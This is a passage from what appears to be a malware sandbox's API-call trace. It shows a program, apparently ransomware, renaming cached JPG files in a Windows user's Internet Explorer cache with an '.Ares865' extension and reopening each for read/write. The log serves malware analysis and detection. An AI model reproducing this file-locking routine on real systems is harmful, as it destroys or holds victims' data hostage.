param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBz9wz[1].jpg.Ares865") returned 117 [0096.782] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBz9wz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbz9wz[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBz9wz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbz9wz[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBz9wz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbz9wz[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.783] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2263) returned 1 [0096.788] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBzxW1[1].jpg.Ares865") returned 117 [0096.788] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBzxW1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbzxw1[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBzxW1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbzxw1[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBzxW1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbzxw1[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.789] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9406) returned 1 [0096.792] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC06Ub[1].jpg.Ares865") returned 117 [0096.793] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC06Ub[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc06ub[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC06Ub[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc06ub[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC06Ub[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc06ub[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.794] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13224) returned 1 [0096.797] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC095c[1].jpg.Ares865") returned 117 [0096.798] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC095c[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc095c[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC095c[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc095c[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.799] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC095c[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc095c[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.799] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1848) returned 1 [0096.802] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0ALC[1].jpg.Ares865") returned 117 [0096.802] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0ALC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0alc[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0ALC[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0alc[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.804] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0ALC[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0alc[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.804] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6053) returned 1 [0096.807] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0lYn[1].jpg.Ares865") returned 117 [0096.807] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0lYn[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0lyn[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0lYn[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0lyn[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0lYn[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0lyn[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.808] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10016) returned 1 [0096.811] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0mlu[1].jpg.Ares865") returned 117 [0096.811] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0mlu[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0mlu[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0mlu[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0mlu[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.812] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0mlu[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0mlu[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.812] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1314) returned 1 [0096.815] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[1].jpg.Ares865") returned 117 [0096.815] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.817] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6287) returned 1 [0096.820] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[2].jpg.Ares865") returned 117 [0096.820] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[2].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[2].jpg.ares865"), dwFlags=0x1) returned 1 [0096.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[2].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.822] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2046) returned 1 [0096.825] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0tCi[1].jpg.Ares865") returned 117 [0096.825] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0tCi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0tci[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0tCi[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0tci[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.826] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0tCi[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0tci[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.827] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12813) returned 1 [0096.830] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDK7Yy[1].jpg.Ares865") returned 117 [0096.830] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDK7Yy[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdk7yy[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDK7Yy[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdk7yy[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDK7Yy[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdk7yy[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.832] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10482) returned 1 [0096.835] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDRbsH[1].jpg.Ares865") returned 117 [0096.835] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDRbsH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdrbsh[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDRbsH[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdrbsh[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.836] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDRbsH[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdrbsh[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.836] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2108) returned 1 [0096.840] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDZoZR[1].jpg.Ares865") returned 117 [0096.840] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDZoZR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdzozr[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDZoZR[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdzozr[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.841] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDZoZR[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdzozr[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.841] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2408) returned 1 [0096.844] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE97O8[1].jpg.Ares865") returned 117 [0096.844] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE97O8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe97o8[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE97O8[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe97o8[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.845] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE97O8[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe97o8[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.845] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2260) returned 1 [0096.848] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE9wSt[1].jpg.Ares865") returned 117 [0096.848] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE9wSt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe9wst[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE9wSt[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe9wst[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.849] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE9wSt[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe9wst[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.850] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1760) returned 1 [0096.855] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEcHle[1].jpg.Ares865") returned 117 [0096.855] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEcHle[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbechle[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEcHle[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbechle[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEcHle[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbechle[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.856] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2233) returned 1 [0096.859] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdE0f[1].jpg.Ares865") returned 117 [0096.859] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdE0f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbede0f[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdE0f[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbede0f[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.860] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdE0f[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbede0f[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.860] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8326) returned 1 [0096.864] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdoQv[1].jpg.Ares865") returned 117 [0096.864] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdoQv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet 